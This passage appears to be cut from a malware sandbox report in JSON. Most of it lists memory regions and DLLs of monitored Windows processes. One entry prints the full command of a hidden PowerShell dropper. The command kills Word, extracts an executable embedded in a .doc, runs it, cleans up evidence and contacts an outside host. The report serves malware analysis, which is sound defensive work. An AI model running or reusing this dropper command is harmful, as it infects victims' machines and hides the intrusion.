"process_00000008-region_00001715-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_313", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799496704, "type": "region", "version": 1 }, "end_va": 8791799562239, "entry_point": 0, "filename": null, "id": "region_1715", "name": "private_0x000007ff00160000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799496704, "timestamp": "00:01:11.175", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001716-addr_0x000007fffff10000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_314", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092104703, "entry_point": 0, "filename": null, "id": "region_1716", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:01:11.175", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001717-addr_0x000007fffff20000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_315", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092104704, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_1717", "name": "private_0x000007fffff20000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092104704, "timestamp": "00:01:11.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791249059840, "type": "region", "version": 1 }, "end_va": 8791260975103, "entry_point": 8791249059840, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_1725", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791249059840, "timestamp": "00:01:11.731", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 35782656, "type": "region", "version": 1 }, "end_va": 35794943, "entry_point": 35782656, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_1733", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 35782656, "timestamp": "00:01:11.901", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 460062720, "type": "region", "version": 1 }, "end_va": 460849151, "entry_point": 460062720, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_1734", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 460062720, "timestamp": "00:01:11.901", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1735", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:11.965", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001740-addr_0x0000000002230000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_323", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 35848192, "type": "region", "version": 1 }, "end_va": 35852287, "entry_point": 0, "filename": null, "id": "region_1740", "name": "private_0x0000000002230000", "norm_filename": null, "region_type": "private_memory", "start_va": 35848192, "timestamp": "00:01:12.115", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 35934207, "entry_point": 35913728, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_1744", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 35913728, "timestamp": "00:01:12.311", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 41684991, "entry_point": 41418752, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_1745", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 41418752, "timestamp": "00:01:12.312", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001746-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_325", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799562240, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_1746", "name": "private_0x000007ff00170000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799562240, "timestamp": "00:01:12.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791244537856, "type": "region", "version": 1 }, "end_va": 8791244742655, "entry_point": 8791244537856, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_1750", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244537856, "timestamp": "00:01:12.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791244800000, "type": "region", "version": 1 }, "end_va": 8791245230079, "entry_point": 8791244800000, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_1751", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244800000, "timestamp": "00:01:12.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, "start_va": 8791245258752, "type": "region", "version": 1 }, "end_va": 8791248592895, "entry_point": 8791245258752, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_1752", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791245258752, "timestamp": "00:01:12.956", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36012031, "entry_point": 35979264, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_1753", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 35979264, "timestamp": "00:01:13.604", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 36569088, "type": "region", "version": 1 }, "end_va": 36573183, "entry_point": 0, "filename": null, "id": "region_1754", "name": "pagefile_0x00000000022e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36569088, "timestamp": "00:01:13.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505610240, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1755", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:01:13.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791242833920, "type": "region", "version": 1 }, "end_va": 8791243771903, "entry_point": 8791242833920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_1756", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791242833920, "timestamp": "00:01:13.619", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791243816960, "type": "region", "version": 1 }, "end_va": 8791244513279, "entry_point": 8791243816960, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_1757", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791243816960, "timestamp": "00:01:13.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 36634624, "type": "region", "version": 1 }, "end_va": 36638719, "entry_point": 0, "filename": null, "id": "region_1804", "name": "pagefile_0x00000000022f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36634624, "timestamp": "00:01:16.635", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001805-addr_0x000000001b780000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_332", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 460849152, "type": "region", "version": 1 }, "end_va": 461897727, "entry_point": 0, "filename": null, "id": "region_1805", "name": "private_0x000000001b780000", "norm_filename": null, "region_type": "private_memory", "start_va": 460849152, "timestamp": "00:01:16.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 6884820666128, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_1806", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:01:16.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 8791238443008, "type": "region", "version": 1 }, "end_va": 8791238696959, "entry_point": 8791238443008, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_1807", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791238443008, "timestamp": "00:01:16.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791239426048, "type": "region", "version": 1 }, "end_va": 8791240572927, "entry_point": 8791239426048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_1808", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791239426048, "timestamp": "00:01:16.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791240605696, "type": "region", "version": 1 }, "end_va": 8791242792959, "entry_point": 8791240605696, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_1809", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791240605696, "timestamp": "00:01:16.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 44695552, "type": "region", "version": 1 }, "end_va": 45039615, "entry_point": 44695552, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_1820", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 44695552, "timestamp": "00:01:17.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791232741376, "type": "region", "version": 1 }, "end_va": 8791234400255, "entry_point": 8791232741376, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": "region_1821", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791232741376, "timestamp": "00:01:17.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791234445312, "type": "region", "version": 1 }, "end_va": 8791235936255, "entry_point": 8791234445312, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_1822", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791234445312, "timestamp": "00:01:17.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791283400704, "type": "region", "version": 1 }, "end_va": 8791290367999, "entry_point": 8791283400704, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_1823", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791283400704, "timestamp": "00:01:17.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791557799936, "type": "region", "version": 1 }, "end_va": 8791557828607, "entry_point": 8791557804448, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_1824", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 8791557799936, "timestamp": "00:01:17.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 42405887, "entry_point": 0, "filename": null, "id": "region_1873", "name": "pagefile_0x0000000002860000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42336256, "timestamp": "00:01:18.886", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\" -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_9", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 9, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000009-region_00001315-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1315", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:07.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1316", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:07.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1317", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:07.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1318", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:07.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1319", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:07.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1320", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:07.656", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001321-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1321", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:07.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5358419968, "type": "region", "version": 1 }, "end_va": 5358907391, "entry_point": 5358470716, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_1322", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5358419968, "timestamp": "00:01:07.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1323", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:07.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1324", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:07.658", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001325-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1325", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:01:07.659", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001326-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1326", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:01:07.659", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001340-addr_0x0000000000220000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_212", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_1340", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:01:07.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1341", "name": 